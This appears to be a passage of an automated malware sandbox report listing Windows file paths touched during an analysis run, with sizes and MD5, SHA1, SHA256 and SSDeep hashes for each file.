SHA256: e6cd0ef2d4976605e234163f25414006fcfd911fd85723fb5d4e28a51062c0ee
SSDeep: 24:43BznA3zBeLYYeVFhKGLwc7/ScPGQ10zdvdVnijCtN6Ora/IBKCXuxRZl+XO62FR:azhLYYe/Y+waxPGQm9nxpgCORP2O6YR
False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\WindowsMail.MSMessageStore 2.02 MB MD5: 196c53d5bec2b1543186a01c430d87ac
SHA1: 2b66308da8a93d784da9040440b1dc0389511d4a
SHA256: f519cc6497eef1b721d8fdafd6263a4a4f89303986bb34b8c078c649956dba3b
SSDeep: 24576:oXDD8PQSkf/8obA3h+R12xkb2L++c0oTFDurAwigWN:OSbItA+DskbkZpoTlIXi5N
False
C:\Users\Default\Favorites\Microsoft Websites\Microsoft At Home.url 0.66 KB MD5: 9cd88b374f86257b7f7470ef294da5bc
SHA1: fc11f82fffd3aae354eba1fab8659b1a5c84e348
SHA256: a7bf0040241354f85517c2d9de8623091b9c4418754fde2199781fd8aff043de
SSDeep: 12:7bLpx1/fqeqgRMJklOHocjPEOPG+k01o8dj5H49lUoilZBKYus5qFvZfe387Vw0C:XLr1/M/1IYNk0C2q9lUP8Y+vF7Q
False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Hand Prints.htm 0.76 KB MD5: dcea0afa183d29732fa2c7a088ec95ab
SHA1: 0b097632c02c7099ce62a2e45995dedaf898ca34
SHA256: f8acaf6ce09a0ea669f69468d469f5826d4cb7627987810c2de20ab7bc971789
SSDeep: 12:uN3I82QjtUMkYlUYQlvzsWbVpOZOhKCtuDbSiSyX+AfjdHS9FeyyoayJORckK3ZC:QIC5C7zsaAZOzASNWjyLyNgO6kKw
False
C:\Users\Default\AppData\Local\Temp\ConfigureMachine.log 0.63 KB MD5: c3584fc08cee9060a3d9e598430be647
SHA1: 89703490dfbcc4675b1dab42d121b029fab1c89c
SHA256: 892cc2087d18c329f17bafbef274f85319011cd901048d3b48600878afb33b69
SSDeep: 12:lhnMSc3HYk2aGBMT0KGXAAmJOyKN3Bj6yYyAuGrhb5z8DsukYOBtrx8O3NcC:lhgok2actfAo/Bjd+zBR8DeY81x39l
False
C:\Users\EEBsYm5\AppData\Roaming\D4hFvv-xbwD80n_k.mp3 69.36 KB MD5: a5a4129912e9564e3be3bcb1af32ec3f
SHA1: 0d7c9e20d22487943c0a0992aa7d9297e9e4913f
SHA256: 6c51b6af01ecb0c7cc2ec54d57f84db27f0e26a20b431df46b2a5cf81a88f9d1
SSDeep: 1536:opE89ZekWkl2yZnNYFXBtVK69akpqLIpXtukZST0rEMzag:opTQkkyZn2FXjr9LpqsdtuwSi
False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Soft Blue.htm 0.75 KB MD5: 455ba2fa50e8a383a2a057a3e3e6155d
SHA1: 477a409464633254ba13e8dcb5cee1078f41c25c
SHA256: 4addb9ed87bbf24fbbca0624ed7c81875b7d57a46bf72948b898d0e2785fc366
SSDeep: 12:jPLlsKtOAaj7GybmR4r/vjOkN8QCNmVLdodLNMEtxyk5a9HChiWjc5SC:jLgDiG7vCkN8pNmVLuwcxyPB3Xx
False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\HandPrints.jpg 4.65 KB MD5: 7d5480e07788cd9010dabbff1669a6e2
SHA1: 068424719033bd5df5e53bbfb265157ea3fe7524
SHA256: 2d1684aab91586b76d91663f99370d604962868df99ffdd52ac62601c2f80687
SSDeep: 96:ZsKlrRaOCE/gD+lsp7aIG3x8lVxs3ZRU8DpfennXMyu0FdZ3bPn+sanbpd:GkruylhtxCVx4ZBpfen8KbZrPn+vd
False
C:\Users\Default\Favorites\Microsoft Websites\Microsoft Store.url 0.66 KB MD5: 206e667224c1717de0f052eaa3588a71
SHA1: 2e6e0d087d9566198c51765afd3da88cfd23c403
SHA256: 48f46f586f1edc0675a0c69f824cc6beef1e53691638fbc0391ca3bcc5d75d10
SSDeep: 12:LzC7wwswpSuHMr22AwnZT7EWbN/PLUeT1E3oRD6d8B9D8vWzvIGhOjlCC:K7FxpSuHU2KZT7EWJ7Ze37wIX
False
C:\Users\EEBsYm5\AppData\Roaming\iaG_GkHNHdnzSAk_0f.avi 49.27 KB MD5: 8e738dbdc24b8dda784c5714d3afa8a7
SHA1: 3ef14211ceef313e36e63cd0315f80062fe70cce
SHA256: 9df25a7ff0228df01029b66958668982f114c7b1b0ca4ed88d7aa47c6863de19
SSDeep: 1536:a6ekNk5bjEHrA9m/HqXu7EEi6bE48+halab0:8IkVELA9m/H97EEi4j0
False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Bears.jpg 1.58 KB MD5: 17f06d07bf929d4bed7af1c6f2c2f05c
SHA1: 4d81ee399067f36a163ab365cf2aeea139a705da
SHA256: 82e80a283feb8493fa9709a586b9df293ba149fb8403908549b19f4faee7eb45
SSDeep: 48:ltKoDhdsGLCRRkoTPRwnGsMe0G+H5rQKmUsi8h9GrUaepP:7KKdnCRRkoTPL9eMHBJSErUa0P
False
C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\08_Video_rated_at_4_or_5_stars.wpl 1.52 KB MD5: cf453a97102743d3378816bdd47c0e40
SHA1: 80c615dfca15f61814b6877f20e90caa0ba819c5
SHA256: a2e95e104cfe60923d26bca185c234c495a9680f842ef9026c85c2748b33caf4
SSDeep: 48:oihkrMA3O1ZhzykkhDTdqo2+kBrH7MpJWKP:3hklS/khDUr+0oJrP
False
C:\Users\Default\Contacts\Administrator.contact 67.31 KB MD5: b7ff1843a78c41bbbac5103f6e985e4d
SHA1: c1ab89f100e691ae952c04bc41d70ee31565e374
SHA256: 059759c37f45a5afb39056d9d2460d1fd045f40fed6625737d607d4ccad78a8a
SSDeep: 1536:MReYumf8vkzcUyt1BgXQgpX2ye37LwP1yC2noAoyfX:MkYu+8LUYLUQ2mfwIZoy/
False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\SoftBlue.jpg 10.85 KB MD5: f5b1ec958e690f158ac7c92ded10b731
SHA1: f9e929a49efd7c06da458682e1821eb2880c222c
SHA256: aa6c72d2b55fa17e8a23806cec60a29ce99333396b604a6a42a71bfaf6e8fe8c
SSDeep: 192:CL90BYWjLQf0azFpTSOUZ87lFifdCMxlA+1wjJOHy/C+awKMcnEybW5GpMy:CLSKSLWzTAZ87TifdCMxlQNOHyHakcn9
False
C:\Users\EEBsYm5\AppData\Roaming\Microsoft\HTML Help\hh.dat 8.92 KB MD5: a9a673b83eaebfad079abaea7c497dfc
SHA1: 4c020c986c8aee74eba6cb897f961ad257c157d5
SHA256: 3ea4b2d698b8b22609817b0a9ff0248177b08be2f02300cadbde4e23dffa36fe
SSDeep: 192:GiOCi9RAcymoWiwxEb7cgg1lZFwMe7yoXvQkF6tWSXu:gRUmo6ib4gAlDwMe7nVFqje
False
C:\Recovery\94048722-4631-11e7-a593-a98775ceb0ae\Winre.wim 10.00 MB MD5: c2698ce163e28905ff84891238959589
SHA1: 9be2f65b63f7ec6be7f10e70c343b9e2f4b52539
SHA256: 0fe434114080e778e0712b3665a4ca1c73ed7e9d115ccb916eb49e215dba6829
SSDeep: 196608:96aX6gTQIGkqojQRljrffo1feRTC+JO2Lg9VgqBpiTGWv8tvgwSDP:R7cI1jeljrffowRxdLgjciWv8tvgV
False
C:\Users\EEBsYm5\AppData\Roaming\5TbJjRTqQcJAG8oUNN.m4a 97.23 KB MD5: 29ecdbbca561061dd6666fa8613a8363
SHA1: 774057da038f3b8229e21731f39efca909a3fdbc
SHA256: 9760d330419d04407ce1a0ca985323465388fdef2d4dace8d7dfb9d7ecef4ab1
SSDeep: 1536:/mMcikbMxvbnnRBuhxr3WVXSz3CuCNisVZQl6MA1+qoMWJ4kTf9t8X:/ZciQMxvbLMxaVX03PCHG4Mk+qcJh9KX
False
C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\07_TV_recorded_in_the_last_week.wpl 1.54 KB MD5: 5a6f5be7d3982b678362c882456afc09
SHA1: 330fbd200c85b3dcdf9c35214dbfeb69997361e3
SHA256: 21d64b3857f919cb96ea94d03c8079735fdd6e2fd3bbdb18cacdf0a1a59e8c67
SSDeep: 48:E6XuCg1YegXN6n7TNtvL0k++O6v1T909Akw6vlQ9:E6+MLN6nr0k++3v1ZQTlQ9
False
C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\09_Music_played_the_most.wpl 1.53 KB MD5: fd9eb73b7364a07d2f8ae5914dc19025
SHA1: 929adc02a68de88f516337ad6f50ce9f3fe97d28
SHA256: c5aa9bda172f301fb06696ad30ef88d2c563b218ab18146ac7586c131343d048
SSDeep: 24:urEcuhFL+Cc0Jwg1zP1oOLRsFfF8Mgm/9E22ZxMa7SyTGNu4gSBIBdOeUAZGQYic:urEcALVD1q8Ml12uyTXzSCdOePGQYMF6
False
C:\Users\Default\AppData\Local\Microsoft\Feeds\FeedsStore.feedsdb-ms 7.03 KB MD5: 832eb902041889733cc0ea72e0f5e8d3
SHA1: 0c12aea6cfcf4fd1c890a38db751c4eca6641fce
SHA256: 8022386178506ad9966851aa2b2df958faefbac2fc7ff9b6fd5d4fcca4227e95
SSDeep: 192:VKw/j3/3MKNfoU0zYxywbOjDTF9BPNGDMBIfuIeuC:9/j3/3oU0sxhbOj1HNoMBouIe3
False
C:\Users\EEBsYm5\AppData\Roaming\k34HcmsYrEK4_.bmp 15.71 KB MD5: 54003f1794e58f776d7947858accec3c
SHA1: ae5cae40728c78985bbb8877191568b40d37def9
SHA256: 2f368e817ac686c204873635f8497ae1aaf0c7c7370aac23067f46787bb8041e
SSDeep: 384:b700KL/A0iAh9tfodWfSukcmAzeGErVl8xiD05Sf:4tXh9tgcSfDzAI
False
C:\Users\EEBsYm5\AppData\Roaming\Cav7r34AQxz266BdGIX.m4a 2.09 KB MD5: 28647c40bde73c36643dda2040237e2a
SHA1: ddf8cb87d6bfe9c5e73d5ad24c2f72faef62314e
SHA256: 980073dc28c25b51b5298294c29fa80950a0dbbd480a8bebe71455070b87ca91
SSDeep: 48:VVNtNMvSQgq28uDWF33jGzRwGX/ZxrBU5E3Ds4rzLgWAF0W0ZD3Fq:VVzEhgqEDWFDUtXRxr2asHEfU
False
C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\02_Music_added_in_the_last_month.wpl 1.78 KB MD5: 02b2a2a5381dd2193f9e94d3f06db25c
SHA1: 15828659893d102b9468418ae9c824f151475530
SHA256: 87248771f32c1691ba60f255e5b6853f93daed59d8fd4b09a584dece01a85601
SSDeep: 48:8w0G71mqFrZOY98c/5Pe5jSML+TZ6yU8CO4UZQQ2MKZod:SG5tZO9c/5G5Dh6gk
False
C:\Users\EEBsYm5\AppData\Roaming\-vZCBx3T8O8PG8Z7.rtf 25.21 KB MD5: b97c6795dad8db7892aed6f14215ff8b
SHA1: 904ddb24d34f439b7aedb82ad0d78269636d5ff1
SHA256: d11d6b1128294ce2cf01c12d207854eb080aaf2b9effb2e5a8235b3a93be3ca9
SSDeep: 768:CYqk7LA0UiKmU+YWclDiMejsHHWpekJFmC:zD7LA0PKm5Yz2MejsHMeIEC
False
C:\Users\EEBsYm5\AppData\Roaming\ABdV76mhVKc67XfMG.odp 66.22 KB MD5: 4864882cd403a18bb0737438a3da58b1
SHA1: 98c22a826221a2ab4e8fddeb635e865d3362005f
SHA256: 7321483960b6937143f106d083f887fdba0c09fcfd97dfb0ea16c2e19a02f3d6
SSDeep: 1536:9PsC7Aovxj8SiER0CwVWmVhDJKeE3V2gH1AilqxTmvFeFOLfUuVizN:ZV7sSDw4mVLOAm5UFtuC
False
C:\Users\EEBsYm5\AppData\Roaming\g-uvZ0afpQw.avi 7.96 KB MD5: 7ae121cd98cb40e4033162243ceca69c
SHA1: 5589463c11c1e0096578d9aea36eb3ede7526555
SHA256: 4f126b31c91afc01d536f4280b5b725c58d5bf5c971b20b45b19b776467f7cdd
SSDeep: 192:DeWwhg8jielQaiIwL90UQfh/V53ACXEogX:qWw/+aiZGUQhfX5gX
False
C:\Users\EEBsYm5\AppData\Roaming\Adobe\Acrobat\10.0\Security\addressbook.acrodata 5.80 KB MD5: c6edb72e9f798253256bc5183f6f35ea
SHA1: 6cbdddb17be4df8f18cbc7055b9594fc322986ed
SHA256: 8f6fd56f7fda672de691175d395885593e852d7f40f5f017c2dc9fd17d12b351
SSDeep: 96:Sp6oVfDpryMAJ5XnXogElA4U4AphxbIBjQUAZ0+hydYaSrl34lLYgSnxJEkY:ScoJDdyd/XKlAn4AFbIEfUdY3rlIlLYw
False
C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Internet Explorer\UserData\Low\3Q4BCXJF\id[1].xml 0.61 KB MD5: 6d7313243fe5a428086e2e714b99593e
SHA1: 3890ed18f93e7ca4e2881eb6ca7271609716799a
SHA256: 4bb5e9369c04f845e08a5d83574e5c71441d4d80f1bc00546af2b34ef163e222
SSDeep: 12:2Exthn1eQBa6JRTvFeNXLULMB+FsFsApiw5It6FIKvhfTaa0+2C:2Exthi6JRTvFYYMIAp5544XvhfTHLb
False
C:\Users\EEBsYm5\AppData\Roaming\Microsoft\MS Project\14\1033\Global.MPT 382.03 KB MD5: 1d38665ea206e7370e18b16be17188d0
SHA1: bff901a929ec4dedb039c6c4fe3dc695734577f1
SHA256: 6b7bcc573729d5388f6fccef563fee67ff8031accce6e8ca9380fcba7f7efb49
SSDeep: 6144:CPDnnXPETcoRAX0raqZZyqG/0ZSuOmmDwhewMcPZV+qIYdpetwXA7AUSrdxuoPf7:sf2GkraqZscZSdmnewhn+q5dpetwXA7g
False
C:\Users\EEBsYm5\AppData\Roaming\CmR7tOD7XC.avi 37.43 KB MD5: ac4f762ff81bc8716eaedd2db75386cf
SHA1: 2269acd985e14b689cdf4894d52ccb4ce77d03f2
SHA256: f05e17959f8f307dfdf3cb1f1432a71829d7af09bf8a095e46b32eb9284b3589
SSDeep: 768:+fTFDZn1ROqmRM3OR1eXX03YX0YGRsxXj/eJDKzJxjO26PmenTpeJpZrrx7NxkK:+fTZZGqm63OR4XFwspWDKz6TpoZHfOK
False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Backup\new\edb00001.log 2.00 MB MD5: 01941b4ea3545bed637450fc70157732
SHA1: 0f858614c72e456d5fd2621ea88a3aa1e407a46a
SHA256: 4ed723f5cc505090301a154f2c9a9e372d1df2c9197b0a9ad4771cfc66cd5e16
SSDeep: 49152:N0QDZMLPrYBPYG9ygECdNN5BzD7S5XzvY1V/6rdFb+ncT7Whyo5:NXDaLDYBPYG9y8NfBLS5XLWhql+cT70
False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\edbres00001.jrs 2.00 MB MD5: 91d982e45fd1bddaa7380a32dd48b0e4
SHA1: 698d63fb446b580df3bc412bd27e3bc8ba1ec198
SHA256: fffa2de436f7e7c9573d0081a76734b764a19d7e40b99070b126196ca214b5f3
SSDeep: 24576:OTIC8F1cMn4jjV9B5M5f9Cg1XGgR4lLvivYKHH4luz:OE1N4jjVpwfkGR4lLviQKHH42
False
C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\11_All_Pictures.wpl 1.10 KB MD5: 4faec776691fa7c568bee307b76674ba
SHA1: 3302e1216e7926ae7ba83671c54fc8dca1ef0770
SHA256: 9e870133f6176f1344bfc7c5a9a3aef3f50b9fbfa66c86590b5407b92f83ac88
SSDeep: 24:zQGnb9zJ66XZEjvDWimrRcRdjsfRwxDiuCDYpMdURmpuH8:p9zJ1wVGcLjSEyF
False
C:\Users\Default\AppData\Roaming\Microsoft\Protect\CREDHIST 0.55 KB MD5: 1a696ccc254483f721f440cbcd8d93b7
SHA1: 9382f35d6166e96e20868cf8c7f0db83cad64b26
SHA256: 6694748ca8190d255b42a0a39266ce4623affbc1c1061aff3e03808d1041968d
SSDeep: 12:s/jYxQmOWMu6GFmq4fe6XaCWxb+y+qyPP0+wX54LSdZYBolf94dS/kLvKtZIRhCx:Mj5WshnfeZCob+yHyPP0+wX54LmYelfN
False
C:\Users\Default\Favorites\Windows Live\Windows Live Gallery.url 0.66 KB MD5: 956c473697185117bf199612f0defb23
SHA1: 728a23eeda010cce31d7afa334d6b02af436b04d
SHA256: 0952fe3d1670dd4e40768cdf2a8a12b460a85fd6ce6d454344db9404db724aa0
SSDeep: 12:TTubjDXxVWmqxCkUxPCP6QMt5kXEGen0hxr+25waqLWFA+raI6dlgOC:WbpYmqEkUlDQMteEUh1+Wwa6f8FTj
False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Backup\new\WindowsMail.pat 16.53 KB MD5: f282e46fd54553795d391cf898330d90
SHA1: 2e340d5d56cb6b30afcbc4023a41303ea393af70
SHA256: 3f2dd58706c1799db68afbc98e8a6d4de96475995fe681c35d60791da22c51bd
SSDeep: 384:AzG6bARYK1yE6H0lq2/8+Lp6GA1WMrC0mk9tnREG:6534yE6HuVQKMmrmdR1
False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Green Bubbles.htm 0.76 KB MD5: 37051351dd6d04989be0f964a6d1991e
SHA1: 8413c6047150aea580c48e548c84a50550357130
SHA256: 97ae678ce34a10559c0b637a9c268c66a172a6e42909842226b194562d8b2bd7
SSDeep: 12:XUaRRKcnkVBbTtnOoZn+G4Z6tg1FwoMVdlQigrAaZLt/TUcTjsjuiVC:kaRIusrOc+5qyfMVgiN0Ucf4O
False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Stars.jpg 7.86 KB MD5: 511812a460e4c536efd0b5c993fc6419
SHA1: 84cbc4fbae9528d87994e86155a594d17f6e658b
SHA256: e055b542e29986e7005ea09a17ac241ea398aeb36ec705721cc671e45babb002
SSDeep: 192:+zYvoBDHHXnUe1smWVTIlVdeP40GvqIbtjXvcrZ:+Y4DImWVTIX440+qszErZ
False
C:\Users\Default\AppData\Roaming\Microsoft\Protect\S-1-5-21-3149542145-3322839065-4058237693-500\Preferred 0.55 KB MD5: 32939e09cdeac9643050ad318a522e56
SHA1: 7aa7597c1a17e76e09079e719e530362084b0790
SHA256: dfae25f385281e900fad752e4e34579a4c0db80ec7187279a1ac00d7e8eef05e
SSDeep: 12:UtwRUy6KEHhXt9LODgUEKglk1LMgfCQji2cAE9TLX8NUC:GCUyBEHhTvUEjlk1kQDcBTO
False
C:\Users\Default\Favorites\MSN Websites\MSN Money.url 0.66 KB MD5: 23d1ed4bffb441e2c99d65a94b87cfb3
SHA1: 8a1a4f419a2ca70f529e7c0ada6e1a4bdeb2b496
SHA256: 80cfa5e76e18dc92663804341eb11e315c09104d573df5119d6de54c9cd09fbb
SSDeep: 12:5C+VHUbxWCjdbAkgCx+87qo3+dlxh2dnuFRCrp8QuEQBeezy3U6i1uQpaSSJfLpy:1j4lAD4+W7+d3h0uFs5IBeMy3K1uQNWc
False
C:\Users\Default\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000001.regtrans-ms 512.53 KB MD5: 9eb242071b7b4703f68cd8dfdfa1ab77
SHA1: eacddb71bda9e44bd0a024c1b7900f13796cc930
SHA256: 19609237a8a93c47e0787e5fd3ac8897cc7292164403f0d3de3c7cff4d5126c8
SSDeep: 12288:CnKgw+1O3bEca3Lf1ZlU4h1+jGmBRPBhNaRdAHDVIYsrqQ1DSLCyuXX:gKx+8Gpfz+tPBXaR+2wQYLLuH
False
C:\Users\Default\Favorites\MSN Websites\MSN Autos.url 0.66 KB MD5: 17d35b10425bc0320e9345b3afc79280
SHA1: 1036e8ac75e92f18e33396565b96c80ca3efcb69
SHA256: 5aa7d1c892e221045786ddfe852c62b70fa6a291111d23813a7e3496547ec9b8
SSDeep: 12:QAlJEo1ubFxMlLdGDBToGmT4Vex76l4nSHNVTF0R5OZRZfH7fjsTnKs7w9w66E8O:/lOMWILdGD1oG8b5Y4Ifp0R5OvZfzo2L
False
C:\Users\Default\Favorites\MSN Websites\MSNBC News.url 0.66 KB MD5: 11ee7caf3bd1a1e3d116baa4a16160ca
SHA1: 61d84ff4ffc844cf47a8713e454bc4f6f9bb9a33
SHA256: 41e06d71700253797a8d9b003df5379ad8398c9c0361accedcb5a014fd772ff9
SSDeep: 12:j1ga981AgUNpydV1DWN9ecZlgBQzGKXgH0F3ySakReX8L6POGEIuC+C:Wa98ygbV8NZlgBQiPH0F3ySNziuEz
False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\account{91E541D8-6C9E-48C0-AB69-0A7168AA62DE}.oeaccount 2.00 KB MD5: 3291e82d938cf3039fdedca46c32716e
SHA1: 207a6c1199be9085469a99b7c8937305c361ec1e
SHA256: 3657fa7e648068cb0fa3c48d79d4367447a639c1e7a213d2386eafffd2d23a2f
SSDeep: 48:cmvweUO2A+3RNueO9YbRKPk4eF6t4puSDia2fdb8+:DvhD2n3hIYbmk4cQg258+
False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\account{553187ED-CFB2-4763-8DAE-48D3609A76AC}.oeaccount 2.22 KB MD5: 2ec450d27a3d3fa61d4db36b38a45883
SHA1: 9f3044b993f556db5f1b5024b6dd0d9b7ff12c4d
SHA256: 4de0d0dd96986ef80b3008002196ccd3ddd236f50d8c55c6131d8f44f86dc201
SSDeep: 48:2c0+hdbKgCX/QsXzKQe0oovO1iGR+LBerSKtdJsztshk:5hdBCX//jKQqIqfaQr53J4b
False
C:\Users\Default\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML 10.48 KB MD5: 31b570bda9928cfa77b9400c3ac2de0e
SHA1: 72e523eed3a81bb9f3693a4288da3920aeafc589
SHA256: 219dd9f408c06c70a6a104dd798f6dae6cdd56998c777eedf7ebb223a2fbe389
SSDeep: 192:/C1gFyOc4zneB7wNsRGEkLcfmAGnpuBq9OAeTSm07awj68pDcJ:/C14NzzeeNpMiWJyewj68pQJ
False
C:\Users\Default\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TM.blf 64.53 KB MD5: cf70009edfe6b7bf9ab21615aa245a60
SHA1: a16c3de68aa58ceb3d8bff4524bb4ac4c7d14ac9
SHA256: 814a73151f58f5cc090c5c1c29a12327f5594574320ab0bb6f7ef71dfd6c9bed
SSDeep: 1536:yrT0nD5xld8XUtnqb4Mpu0V/V15zGrInJ5lQBLb17S:pDld8kRXMAQ15zGraFSL5O
False
C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\10_All_Music.wpl 1.57 KB MD5: fdb27fa5d8e110b20ea0db7f356e68c4
SHA1: 680432600d4177adffc494a76a13a2746c069802
SHA256: bddb078e38e4dcefba9daa3700d6387120d60513699638219503b3c54803a13c
SSDeep: 24:MULj8w0+sz36wOkqoxtFzsqhjBHfJMegtQ8kQZ+ct6pv8BtKIBy95XvF9TTrQ/kf:zLcAElzsiXMegtYQ0cIpgBy3/3QIoq+K
False
C:\Users\Default\AppData\Local\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\WebSlices~\Web Slice Gallery~.feed-ms 28.53 KB MD5: c642dccbaabc1ac5d2070a10b1486449
SHA1: 8590c442b6ed2906f59140c75fc63429a2721ebb
SHA256: fb30fb269d6ec5bbd38d8b150569c7025ca9d410b475861571e77fb6dc64cf2b
SSDeep: 768:FUCViHlB+poF5alVgtuK4n7EBrdXnz3CxU305Fw1:FUCViHj+6F5alVg34n4BhXO071
False
C:\Users\EEBsYm5\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\settings.sol 0.81 KB MD5: d7ff79a732a1d62b5319457801096e04
SHA1: 3d4eed2e06da601457b2d724c2021c1e99f0e2c4
SHA256: b66a3564ade63ff97fdf00ac9180a4c8a4330b43a92f558f12b7bfb848a9a06f
SSDeep: 12:tOQgrPxCeRFOTE26DvsC2AfE8D46Me5eujdHQ1G1AKGeQcjtwp5yShNEAsf123wv:0pvEAc8d5eedHQ15PAWhSAMAA3eHCX
False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Orange Circles.htm 0.76 KB MD5: f50f7419f49ffaa8aa2291f31e572bbb
SHA1: ff809bb4958916967c6b958d7b9b7b98dac922c1
SHA256: 51188af708beb749205928e42358a0d9801b662708d04ca0170d72cdc91931e0
SSDeep: 12:sdHxFDwadzT6czwmkKNrYUbk5mICQejlQoxion8UU0izLb+gcdlZTv4XmVyMvqSC:sdRFN5RUm5F7lQosoupsZ8WgMA
False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\edb.log 2.00 MB MD5: d93a44e501e5c3cc2b6937c1d3d0168f
SHA1: 267aabbff3225cb6ae478491eebbf5462cf7cb17
SHA256: b569508d9f685853740ac5aca5be27139763edcc70eb7b36236572f3635bf5b9
SSDeep: 49152:shxJziMmsyUbifkB1MLqQZ1eoP8PjbamOTkHul2C1/h0myXv:exxiMaUeMDMLqQjeokPjFmkHHCBz4v
False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\OrangeCircles.jpg 6.76 KB MD5: 3e9d681cc8eeb716b55d08fe17756d11
SHA1: b1a2df0cdcb4976a3b5be33686ffdd48df21c4eb
SHA256: f8ec0d873d4e374a7e8fada6224bc7f52140a5c270257f155b5237295c488f68
SSDeep: 192:jh5QKTEtos75LYXdIVfddOZ+3YiBYiAA2K4/A5E:F5QKTEtoKsNwTeGuJ/SE
False
C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\05_Pictures_taken_in_the_last_month.wpl 1.31 KB MD5: 42d63b1f0bafbe255569b5ec52570c15
SHA1: ed28d34c1ff4574c722b5e0d5e67fba96c52ad61
SHA256: cf4b0ae5065f1ffce3fb80ec4003a4ed4dc90ab3b94c1ff69d256456126a5bb2
SSDeep: 24:JBBHK9kjveXV5Qm7gGPFgsMoQXCh/wnLF0Edhj+wY5rKwglVUbl:fBq9kr07Qm7Z/3Q5LBqrHglVYl
False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\edbres00002.jrs 2.00 MB MD5: c0104241ff99983b2634b150f29effb7
SHA1: e6f64bfaa399f1c49d3fd68fab1b45b7f09b5cbd
SHA256: 340ee7b49035d2a8269e9de3c9965407e67c7f7a726b85e0a987cf454fa6929f
SSDeep: 24576:kSnPI2XPx+FNm2H2T/E770JlJe3WYB7QUDEqQfmhFl/RS:hnP5kFovaSG3smhDRS
False
C:\Users\Default\Favorites\Links\Web Slice Gallery.url 0.75 KB MD5: e6fa0249ab3444a15f4a8dd11986b109
SHA1: c6466b1076f94801f57429e97bba6440ed6790f9
SHA256: e876fa7e8e53bb516218fc70b7861cbe9d9a016458311f031d21b0bfb7b3ca94
SSDeep: 12:I/Pf9Eg/qCRIi3fLJ5uZQCo0vmt0fwweAXN/citP6f/mM36qXCivVg3ItoI6BFyd:IP9v9Ii3dy2Dt04Tm63mo6Kd9g4toxFy
False
C:\Users\EEBsYm5\AppData\Roaming\Adobe\Acrobat\10.0\Security\CRLCache\A9B8213768ADC68AF64FCC6409E8BE414726687F.crl 37.35 KB MD5: 8292e61691a7abfb88b484d37b445484
SHA1: e494eb83aecb03b58f1867d1165383369a8398af
SHA256: dca89b31d2656bdba4ea7cce89d61b88f13d11b2eb3118d9896ee6b7a198c85a
SSDeep: 768:rpmlCq5ybvJkyiNgNeVbMwNUcZjmquZx8O4bsBgtWSJ+UEFtz:9I/5KJcg2bZvKqE4ztWSUU+
False
C:\Users\Default\Favorites\Microsoft Websites\Microsoft At Work.url 0.66 KB MD5: 25da10502e6c2ccebb32467fc8493819
SHA1: a616b9eedea23d2fd02270141c5235cedd0f8ac4
SHA256: 2f64ee5a208e66ff874cc9d06770a947e565b73ab6af69538db713042836ca13
SSDeep: 12:sKeLQ17gXbWJiCZiO4e+QdMUVhO66ej1mJPydjFgKCzS26LTM/Ofyw1EC:sKeLdbUiCSWOa6ej1mRydjFgKZnMcywH
False
C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3785418085-2572485238-895829336-1000\83aa4cc77f591dfc2374580bbd95f6ba_cdd36b99-6027-4bbf-bf10-e7f8b416e3fb 0.57 KB MD5: 3381646a049e590114f7679de8f12dde
SHA1: 5984e6a5fe312bdb906f128ba6afde6817c9b6e0
SHA256: 01ffb95b44214dcceab33a6b2b887d6abd454ca899b527be135c8dcc254d05ac
SSDeep: 12:TCmoN8O/rc/2pLJrAvF+ZNUw3iBK+PkRtdMpsxeCB3M6FE3pIuHmhyC:sN3hJrkiCCT3zypU6GEhmJ
False
C:\Users\Default\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.DTD 1.01 KB MD5: d186b0ff13789fd47dbfcf8e8684581a
SHA1: 4ca91c3dca2649206857ed1d21efe13458ce71ca
SHA256: 9866d21596d33a6b957cb3be3dd74d681ac3dfd4d23185266309d32760508365
SSDeep: 24:0lLHcEHyXNeHvrf/PuBU2I5Cw7OZjKzA77c8VN41GyfVwT7s5qQMA6XSWNtS8qhf:0l7tyIkGnOZOzU7c8D4IwVQ7s4pvS7h
False
C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Internet Explorer\UserData\L3DK0KAH\id[1].xml 0.61 KB MD5: 7cb7490f85e987a464dc83bec18e7f2e
SHA1: 56de93d0326cea37deef2a8fad32fc719323dbe1
SHA256: d6fcf9c8e14009381ae034b9c69996d9f6a7dfae4301f53f5d8d865ff694c2bb
SSDeep: 12:mMqe6GI0v0D/RP0AORKhChOlhP0N7rmHcVCGzZMHMZdxQTlQODSNDsMcE30FMC:B3tJv0V8lRKUhe8tMJGzZ+MuTO99y
False
